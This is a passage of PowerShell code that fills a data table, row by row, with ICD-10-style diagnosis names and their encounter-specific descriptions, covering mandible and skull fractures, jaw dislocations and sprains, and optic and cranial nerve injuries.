of condylar process of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture of condylar process of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture of condylar process of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture of condylar process of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture of condylar process of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of right mandible","Fracture of condylar process of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of condylar process of left mandible","Fracture of condylar process of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of mandible, unspecified side","Fracture of subcondylar process of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of right mandible","Fracture of subcondylar process of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of subcondylar process of left mandible","Fracture of subcondylar process of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of mandible, unspecified side","Fracture of coronoid process of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of right mandible","Fracture of coronoid process of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of coronoid process of left mandible","Fracture of coronoid process of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of mandible, unspecified side","Fracture of ramus of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of right mandible","Fracture of ramus of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of ramus of left mandible","Fracture of ramus of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of angle of mandible, unspecified side","Fracture of angle of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of angle of right mandible","Fracture of angle of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of angle of left mandible","Fracture of angle of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of symphysis of mandible","Fracture of symphysis of mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of mandible, unspecified side","Fracture of alveolus of mandible, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of right mandible","Fracture of alveolus of right mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of alveolus of left mandible","Fracture of alveolus of left mandible, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of mandible of other specified site","Fracture of mandible of other specified site, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, unspecified side","Fracture of other specified skull and facial bones, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, right side","Fracture of other specified skull and facial bones, right side, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of other specified skull and facial bones, left side","Fracture of other specified skull and facial bones, left side, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of skull","Unspecified fracture of skull, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of facial bones","Unspecified fracture of facial bones, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, unspecified side","Dislocation of jaw, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, unspecified side","Dislocation of jaw, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, unspecified side","Dislocation of jaw, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, right side","Dislocation of jaw, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, right side","Dislocation of jaw, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, right side","Dislocation of jaw, right side, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, left side","Dislocation of jaw, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, left side","Dislocation of jaw, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, left side","Dislocation of jaw, left side, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, bilateral","Dislocation of jaw, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, bilateral","Dislocation of jaw, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of jaw, bilateral","Dislocation of jaw, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of septal cartilage of nose","Dislocation of septal cartilage of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of septal cartilage of nose","Dislocation of septal cartilage of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of septal cartilage of nose","Dislocation of septal cartilage of nose, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of tooth","Dislocation of tooth, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tooth","Dislocation of tooth, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of tooth","Dislocation of tooth, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, unspecified side","Sprain of jaw, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, unspecified side","Sprain of jaw, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, unspecified side","Sprain of jaw, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, right side","Sprain of jaw, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, right side","Sprain of jaw, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, right side","Sprain of jaw, right side, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, left side","Sprain of jaw, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, left side","Sprain of jaw, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, left side","Sprain of jaw, left side, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, bilateral","Sprain of jaw, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, bilateral","Sprain of jaw, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of jaw, bilateral","Sprain of jaw, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of head","Sprain of joints and ligaments of other parts of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of head","Sprain of joints and ligaments of other parts of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of other parts of head","Sprain of joints and ligaments of other parts of head, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of head","Sprain of joints and ligaments of unspecified parts of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of head","Sprain of joints and ligaments of unspecified parts of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of joints and ligaments of unspecified parts of head","Sprain of joints and ligaments of unspecified parts of head, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, right eye","Injury of optic nerve, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, right eye","Injury of optic nerve, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, right eye","Injury of optic nerve, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, left eye","Injury of optic nerve, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, left eye","Injury of optic nerve, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, left eye","Injury of optic nerve, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, unspecified eye","Injury of optic nerve, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, unspecified eye","Injury of optic nerve, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic nerve, unspecified eye","Injury of optic nerve, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic chiasm","Injury of optic chiasm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic chiasm","Injury of optic chiasm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic chiasm","Injury of optic chiasm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, right side","Injury of optic tract and pathways, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, right side","Injury of optic tract and pathways, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, right side","Injury of optic tract and pathways, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, left side","Injury of optic tract and pathways, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, left side","Injury of optic tract and pathways, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, left side","Injury of optic tract and pathways, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, unspecified side","Injury of optic tract and pathways, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, unspecified side","Injury of optic tract and pathways, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of optic tract and pathways, unspecified side","Injury of optic tract and pathways, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, right side","Injury of visual cortex, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, right side","Injury of visual cortex, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, right side","Injury of visual cortex, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, left side","Injury of visual cortex, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, left side","Injury of visual cortex, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, left side","Injury of visual cortex, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, unspecified side","Injury of visual cortex, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, unspecified side","Injury of visual cortex, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of visual cortex, unspecified side","Injury of visual cortex, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, unspecified side","Injury of oculomotor nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, unspecified side","Injury of oculomotor nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, unspecified side","Injury of oculomotor nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, right side","Injury of oculomotor nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, right side","Injury of oculomotor nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, right side","Injury of oculomotor nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, left side","Injury of oculomotor nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, left side","Injury of oculomotor nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of oculomotor nerve, left side","Injury of oculomotor nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, unspecified side","Injury of trochlear nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, unspecified side","Injury of trochlear nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, unspecified side","Injury of trochlear nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, right side","Injury of trochlear nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, right side","Injury of trochlear nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, right side","Injury of trochlear nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, left side","Injury of trochlear nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, left side","Injury of trochlear nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trochlear nerve, left side","Injury of trochlear nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, unspecified side","Injury of trigeminal nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, unspecified side","Injury of trigeminal nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, unspecified side","Injury of trigeminal nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, right side","Injury of trigeminal nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, right side","Injury of trigeminal nerve, right side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, right side","Injury of trigeminal nerve, right side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, left side","Injury of trigeminal nerve, left side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, left side","Injury of trigeminal nerve, left side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of trigeminal nerve, left side","Injury of trigeminal nerve, left side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, unspecified side","Injury of abducent nerve, unspecified side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, unspecified side","Injury of abducent nerve, unspecified side, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, unspecified side","Injury of abducent nerve, unspecified side, sequela") + $null = $DiagnosisList.Rows.Add("Injury of abducent nerve, right side","Injury of abducent nerve, right side, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of 